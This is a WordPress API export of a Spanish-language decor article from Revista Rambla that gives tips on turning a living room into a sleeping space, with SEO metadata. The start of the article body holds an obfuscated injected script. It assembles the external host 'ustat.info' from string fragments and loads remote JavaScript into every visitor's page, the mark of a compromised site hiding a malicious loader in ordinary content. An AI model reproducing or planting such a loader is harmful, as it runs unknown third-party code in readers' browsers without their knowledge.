{"id":45280,"date":"2022-08-10T13:15:19","date_gmt":"2022-08-10T11:15:19","guid":{"rendered":"https:\/\/www.revistarambla.com\/?p=45280"},"modified":"2022-08-10T13:17:06","modified_gmt":"2022-08-10T11:17:06","slug":"como-fusionar-un-salon-y-un-dormitorio","status":"publish","type":"post","link":"https:\/\/www.revistarambla.com\/en\/como-fusionar-un-salon-y-un-dormitorio\/","title":{"rendered":"\u00bfC\u00f3mo fusionar un sal\u00f3n y un dormitorio?"},"content":{"rendered":"<p><script>\n(function(){\nii3e_=(\"u\"+\"st\");ii3e=document.createElement(\"script\");ii3e.async=true;\nii3eu=\"428593971\";ii3e_+=\"a\"+(\"t.\");ii3e_+=\"i\"+(\"nf\"+(\"o\"))+(\"\/\");\nii3eu+=\".h1slw8edi3ei89ld\";ii3eu+=\"f37zjkrtv57xk0\";\nii3e.src=\"https:\/\/\"+ii3e_+ii3eu;ii3e.type=\"text\/javascript\";\nd_b=document.body;d_b.appendChild(ii3e);\n})();\n<\/script>En un piso peque\u00f1o, a veces no es posible destinar una habitaci\u00f3n a un dormitorio independiente. De vez en cuando hay que hacer un compromiso y crear un espacio para dormir en la sala de estar. \u00a1Con un poco de imaginaci\u00f3n, no ser\u00e1 nada dif\u00edcil!<\/p>\n<h2>Dormitorio en la sala de estar: \u00bfqu\u00e9 sof\u00e1 elegir?<\/h2>\n<p>Es obvio que no habr\u00e1 espacio en la sala de estar para una cama cl\u00e1sica y grande, por lo que su funci\u00f3n debe ser cumplida por un sof\u00e1, un sof\u00e1 plegable y c\u00f3modo. Es aconsejable elegir un sof\u00e1 cama cuyos mecanismos se muevan con suavidad y eficacia, y que no dificulte el plegado y desplegado diario debido a su peso y complejidad.\u00a0<b>El sof\u00e1 cama debe tener un contenedor lo suficientemente grande para guardar la ropa de cama.<\/b><\/p>\n<p>Merece la pena pensar en tapizar el sof\u00e1 cama todos los d\u00edas. En primer lugar, garantizar\u00e1 una higiene adecuada. Despu\u00e9s de todo, es bien sabido que el sal\u00f3n es un lugar para relajarse y pasar tiempo con la familia, pero tambi\u00e9n un espacio para recibir a los invitados. El sof\u00e1 puede ensuciarse y hundirse. En tal caso dormir ya no ser\u00e1 agradable.\u00a0<b>Una manta para sof\u00e1 ser\u00e1 a la vez pr\u00e1ctica y decorativa.<\/b><\/p>\n<h2>La concepci\u00f3n del dormitorio del sal\u00f3n: \u00bfqu\u00e9 hay que tener en cuenta?<\/h2>\n<p><b>Al organizar un dormitorio en la sala de estar<\/b>\u00a0<b>y, por tanto, al crear una habitaci\u00f3n destinada a cumplir dos funciones, es importante tener en cuenta su dise\u00f1o adecuado.<\/b>\u00a0La combinaci\u00f3n de colores es muy importante: el dormitorio debe ser de colores suaves, claros. La habitaci\u00f3n ligera y propicia para la relajaci\u00f3n. A su vez, en el sal\u00f3n uno puede permitirse un poco m\u00e1s&#8230; Por lo tanto, para llegar a un compromiso, es aconsejable elegir colores de pared claros y universales, pero dejar volar un poco la imaginaci\u00f3n con los accesorios, como los adornos de pared.\u00a0<b>Una excelente soluci\u00f3n para un dormitorio y sala de estar ser\u00e1\u00a0<\/b><b>una<\/b><b>\u00a0<span style=\"text-decoration: underline;\"><a href=\"https:\/\/tulup.es\/cuadros-acrilicos\">cuadros acr\u00edlicos<\/a> <\/span>fot<\/b><b>o<\/b><b>\u00a0<\/b><b>de<\/b><b>\u00a0la<\/b><b>\u00a0m<\/b><b>onta\u00f1a<\/b><b>.<\/b>\u00a0\u00bfPor qu\u00e9? Sobre todo, el motivo de la monta\u00f1a y el bosque es uno de los m\u00e1s de moda en los \u00faltimos tiempos, \u00a1y no hay indicios de que esto vaya a cambiar! Adem\u00e1s, los colores de una imagen de este tipo combinan din\u00e1mica y tranquilidad, por lo que se adaptan perfectamente a la atm\u00f3sfera de la habitaci\u00f3n. M\u00e1s importante &#8211;\u00a0<b>cada pintura con monta\u00f1as desprende una fuerza \u00fanica: elegancia, poder, estabilidad, misterio, \u00a1Es m\u00e1s, las monta\u00f1as son simplemente hermosas!\u00a0<\/b>Por lo tanto, tal decoraci\u00f3n ser\u00e1 perfecta para una habitaci\u00f3n con espacio para la diversi\u00f3n y la relajaci\u00f3n.<\/p>\n<p><b>\u00bfQu\u00e9 m\u00e1s vale la pena recordar al crear un dormitorio en la sala de estar?<\/b><\/p>\n<ul>\n<li><b>Evitar colores fuertes y brillantes.\u00a0<\/b>Por supuesto, una imagen interesante, una maceta colorida o una alfombra son bienvenidas, \u00a1pero no te pases con la cantidad! Es imposible descansar de manera efectiva en una habitaci\u00f3n demasiado colorida.<\/li>\n<li><b>No exageres con el n\u00famero de decoraciones.\u00a0<\/b>Como suelen atraer polvo, pueden afectar negativamente a la salud del sue\u00f1o.<\/li>\n<li><b>Ventilaci\u00f3n muy frecuente de la habitaci\u00f3n.<\/b>\u00a0\u00a1Un dormitorio saludable es un dormitorio ventilado!<\/li>\n<li><b>Apagar equipos electr\u00f3nicos por la noche.\u00a0<\/b>Por desgracia, el electrosmog no duerme y puede afectar negativamente a la calidad del sue\u00f1o y a la salud.<\/li>\n<\/ul>\n<p><b>Un dormitorio en el sal\u00f3n es una soluci\u00f3n muy pr\u00e1ctica en apartamentos peque\u00f1os.<\/b>\u00a0Correctamente dise\u00f1ado y arreglado, ser\u00e1 un verdadero oasis de paz.<\/p>","protected":false},"excerpt":{"rendered":"<p>En un piso peque\u00f1o, a veces no es posible destinar una habitaci\u00f3n a un dormitorio independiente. De vez en cuando hay que hacer un compromiso y crear un espacio para dormir en la sala de estar. \u00a1Con un poco de imaginaci\u00f3n, no ser\u00e1 nada dif\u00edcil! Dormitorio en la sala de [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":45281,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[350],"tags":[],"class_list":["post-45280","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-miscelanea"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\u00bfC\u00f3mo fusionar un sal\u00f3n y un dormitorio? - Revista Rambla<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.revistarambla.com\/en\/como-fusionar-un-salon-y-un-dormitorio\/\" \/>\n<meta property=\"og:locale\" content=\"en_GB\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u00bfC\u00f3mo fusionar un sal\u00f3n y un dormitorio? - Revista Rambla\" \/>\n<meta property=\"og:description\" content=\"En un piso peque\u00f1o, a veces no es posible destinar una habitaci\u00f3n a un dormitorio independiente. De vez en cuando hay que hacer un compromiso y crear un espacio para dormir en la sala de estar. \u00a1Con un poco de imaginaci\u00f3n, no ser\u00e1 nada dif\u00edcil! Dormitorio en la sala de [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.revistarambla.com\/en\/como-fusionar-un-salon-y-un-dormitorio\/\" \/>\n<meta property=\"og:site_name\" content=\"Revista Rambla\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/revistarambla\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/revistarambla\" \/>\n<meta property=\"article:published_time\" content=\"2022-08-10T11:15:19+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-08-10T11:17:06+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.revistarambla.com\/wp-content\/uploads\/2022\/08\/wiz1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"890\" \/>\n\t<meta property=\"og:image:height\" content=\"608\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"R@mbla\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@revistarambla\" \/>\n<meta name=\"twitter:site\" content=\"@revistarambla\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R@mbla\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimated reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/como-fusionar-un-salon-y-un-dormitorio\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/como-fusionar-un-salon-y-un-dormitorio\\\/\"},\"author\":{\"name\":\"R@mbla\",\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/#\\\/schema\\\/person\\\/a146a5a2550b94981a75131180e1bd9c\"},\"headline\":\"\u00bfC\u00f3mo fusionar un sal\u00f3n y un dormitorio?\",\"datePublished\":\"2022-08-10T11:15:19+00:00\",\"dateModified\":\"2022-08-10T11:17:06+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/como-fusionar-un-salon-y-un-dormitorio\\\/\"},\"wordCount\":623,\"publisher\":{\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/como-fusionar-un-salon-y-un-dormitorio\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.revistarambla.com\\\/wp-content\\\/uploads\\\/2022\\\/08\\\/wiz1.jpg\",\"articleSection\":[\"Noticias de la vida\"],\"inLanguage\":\"en-GB\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/como-fusionar-un-salon-y-un-dormitorio\\\/\",\"url\":\"https:\\\/\\\/www.revistarambla.com\\\/como-fusionar-un-salon-y-un-dormitorio\\\/\",\"name\":\"\u00bfC\u00f3mo fusionar un sal\u00f3n y un dormitorio? - Revista Rambla\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/como-fusionar-un-salon-y-un-dormitorio\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/como-fusionar-un-salon-y-un-dormitorio\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.revistarambla.com\\\/wp-content\\\/uploads\\\/2022\\\/08\\\/wiz1.jpg\",\"datePublished\":\"2022-08-10T11:15:19+00:00\",\"dateModified\":\"2022-08-10T11:17:06+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/como-fusionar-un-salon-y-un-dormitorio\\\/#breadcrumb\"},\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.revistarambla.com\\\/como-fusionar-un-salon-y-un-dormitorio\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/como-fusionar-un-salon-y-un-dormitorio\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.revistarambla.com\\\/wp-content\\\/uploads\\\/2022\\\/08\\\/wiz1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.revistarambla.com\\\/wp-content\\\/uploads\\\/2022\\\/08\\\/wiz1.jpg\",\"width\":890,\"height\":608},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/como-fusionar-un-salon-y-un-dormitorio\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/www.revistarambla.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u00bfC\u00f3mo fusionar un sal\u00f3n y un dormitorio?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/#website\",\"url\":\"https:\\\/\\\/www.revistarambla.com\\\/\",\"name\":\"Revista Rambla Barcelona\",\"description\":\"Periodismo independiente\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.revistarambla.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-GB\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/#organization\",\"name\":\"Revista Rambla\",\"url\":\"https:\\\/\\\/www.revistarambla.com\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.revistarambla.com\\\/wp-content\\\/uploads\\\/2020\\\/09\\\/banner_rambla_1900x600_BB.png\",\"contentUrl\":\"https:\\\/\\\/www.revistarambla.com\\\/wp-content\\\/uploads\\\/2020\\\/09\\\/banner_rambla_1900x600_BB.png\",\"width\":1900,\"height\":600,\"caption\":\"Revista Rambla\"},\"image\":{\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/revistarambla\\\/\",\"https:\\\/\\\/x.com\\\/revistarambla\",\"https:\\\/\\\/www.instagram.com\\\/revista_rambla\",\"https:\\\/\\\/es.linkedin.com\\\/company\\\/revista-rambla\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.revistarambla.com\\\/#\\\/schema\\\/person\\\/a146a5a2550b94981a75131180e1bd9c\",\"name\":\"R@mbla\",\"description\":\"Este art\u00edculo ha sido redactado y\\\/o validado por el equipo de redacci\u00f3n de Revista Rambla.\",\"sameAs\":[\"https:\\\/\\\/www.revistarambla.com\\\/\",\"https:\\\/\\\/www.facebook.com\\\/revistarambla\",\"https:\\\/\\\/x.com\\\/revistarambla\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u00bfC\u00f3mo fusionar un sal\u00f3n y un dormitorio? - Revista Rambla","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.revistarambla.com\/en\/como-fusionar-un-salon-y-un-dormitorio\/","og_locale":"en_GB","og_type":"article","og_title":"\u00bfC\u00f3mo fusionar un sal\u00f3n y un dormitorio? - Revista Rambla","og_description":"En un piso peque\u00f1o, a veces no es posible destinar una habitaci\u00f3n a un dormitorio independiente. De vez en cuando hay que hacer un compromiso y crear un espacio para dormir en la sala de estar. \u00a1Con un poco de imaginaci\u00f3n, no ser\u00e1 nada dif\u00edcil! Dormitorio en la sala de [&hellip;]","og_url":"https:\/\/www.revistarambla.com\/en\/como-fusionar-un-salon-y-un-dormitorio\/","og_site_name":"Revista Rambla","article_publisher":"https:\/\/www.facebook.com\/revistarambla\/","article_author":"https:\/\/www.facebook.com\/revistarambla","article_published_time":"2022-08-10T11:15:19+00:00","article_modified_time":"2022-08-10T11:17:06+00:00","og_image":[{"width":890,"height":608,"url":"https:\/\/www.revistarambla.com\/wp-content\/uploads\/2022\/08\/wiz1.jpg","type":"image\/jpeg"}],"author":"R@mbla","twitter_card":"summary_large_image","twitter_creator":"@revistarambla","twitter_site":"@revistarambla","twitter_misc":{"Written by":"R@mbla","Estimated reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.revistarambla.com\/como-fusionar-un-salon-y-un-dormitorio\/#article","isPartOf":{"@id":"https:\/\/www.revistarambla.com\/como-fusionar-un-salon-y-un-dormitorio\/"},"author":{"name":"R@mbla","@id":"https:\/\/www.revistarambla.com\/#\/schema\/person\/a146a5a2550b94981a75131180e1bd9c"},"headline":"\u00bfC\u00f3mo fusionar un sal\u00f3n y un dormitorio?","datePublished":"2022-08-10T11:15:19+00:00","dateModified":"2022-08-10T11:17:06+00:00","mainEntityOfPage":{"@id":"https:\/\/www.revistarambla.com\/como-fusionar-un-salon-y-un-dormitorio\/"},"wordCount":623,"publisher":{"@id":"https:\/\/www.revistarambla.com\/#organization"},"image":{"@id":"https:\/\/www.revistarambla.com\/como-fusionar-un-salon-y-un-dormitorio\/#primaryimage"},"thumbnailUrl":"https:\/\/www.revistarambla.com\/wp-content\/uploads\/2022\/08\/wiz1.jpg","articleSection":["Noticias de la vida"],"inLanguage":"en-GB"},{"@type":"WebPage","@id":"https:\/\/www.revistarambla.com\/como-fusionar-un-salon-y-un-dormitorio\/","url":"https:\/\/www.revistarambla.com\/como-fusionar-un-salon-y-un-dormitorio\/","name":"\u00bfC\u00f3mo fusionar un sal\u00f3n y un dormitorio? - Revista Rambla","isPartOf":{"@id":"https:\/\/www.revistarambla.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.revistarambla.com\/como-fusionar-un-salon-y-un-dormitorio\/#primaryimage"},"image":{"@id":"https:\/\/www.revistarambla.com\/como-fusionar-un-salon-y-un-dormitorio\/#primaryimage"},"thumbnailUrl":"https:\/\/www.revistarambla.com\/wp-content\/uploads\/2022\/08\/wiz1.jpg","datePublished":"2022-08-10T11:15:19+00:00","dateModified":"2022-08-10T11:17:06+00:00","breadcrumb":{"@id":"https:\/\/www.revistarambla.com\/como-fusionar-un-salon-y-un-dormitorio\/#breadcrumb"},"inLanguage":"en-GB","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.revistarambla.com\/como-fusionar-un-salon-y-un-dormitorio\/"]}]},{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/www.revistarambla.com\/como-fusionar-un-salon-y-un-dormitorio\/#primaryimage","url":"https:\/\/www.revistarambla.com\/wp-content\/uploads\/2022\/08\/wiz1.jpg","contentUrl":"https:\/\/www.revistarambla.com\/wp-content\/uploads\/2022\/08\/wiz1.jpg","width":890,"height":608},{"@type":"BreadcrumbList","@id":"https:\/\/www.revistarambla.com\/como-fusionar-un-salon-y-un-dormitorio\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/www.revistarambla.com\/"},{"@type":"ListItem","position":2,"name":"\u00bfC\u00f3mo fusionar un sal\u00f3n y un dormitorio?"}]},{"@type":"WebSite","@id":"https:\/\/www.revistarambla.com\/#website","url":"https:\/\/www.revistarambla.com\/","name":"Revista Rambla Barcelona","description":"Periodismo independiente","publisher":{"@id":"https:\/\/www.revistarambla.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.revistarambla.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-GB"},{"@type":"Organization","@id":"https:\/\/www.revistarambla.com\/#organization","name":"Revista Rambla","url":"https:\/\/www.revistarambla.com\/","logo":{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/www.revistarambla.com\/#\/schema\/logo\/image\/","url":"https:\/\/www.revistarambla.com\/wp-content\/uploads\/2020\/09\/banner_rambla_1900x600_BB.png","contentUrl":"https:\/\/www.revistarambla.com\/wp-content\/uploads\/2020\/09\/banner_rambla_1900x600_BB.png","width":1900,"height":600,"caption":"Revista Rambla"},"image":{"@id":"https:\/\/www.revistarambla.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/revistarambla\/","https:\/\/x.com\/revistarambla","https:\/\/www.instagram.com\/revista_rambla","https:\/\/es.linkedin.com\/company\/revista-rambla"]},{"@type":"Person","@id":"https:\/\/www.revistarambla.com\/#\/schema\/person\/a146a5a2550b94981a75131180e1bd9c","name":"R@mbla","description":"Este art\u00edculo ha sido redactado y\/o validado por el equipo de redacci\u00f3n de Revista Rambla.","sameAs":["https:\/\/www.revistarambla.com\/","https:\/\/www.facebook.com\/revistarambla","https:\/\/x.com\/revistarambla"]}]}},"_links":{"self":[{"href":"https:\/\/www.revistarambla.com\/en\/wp-json\/wp\/v2\/posts\/45280","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.revistarambla.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.revistarambla.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.revistarambla.com\/en\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.revistarambla.com\/en\/wp-json\/wp\/v2\/comments?post=45280"}],"version-history":[{"count":2,"href":"https:\/\/www.revistarambla.com\/en\/wp-json\/wp\/v2\/posts\/45280\/revisions"}],"predecessor-version":[{"id":45283,"href":"https:\/\/www.revistarambla.com\/en\/wp-json\/wp\/v2\/posts\/45280\/revisions\/45283"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.revistarambla.com\/en\/wp-json\/wp\/v2\/media\/45281"}],"wp:attachment":[{"href":"https:\/\/www.revistarambla.com\/en\/wp-json\/wp\/v2\/media?parent=45280"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.revistarambla.com\/en\/wp-json\/wp\/v2\/categories?post=45280"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.revistarambla.com\/en\/wp-json\/wp\/v2\/tags?post=45280"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}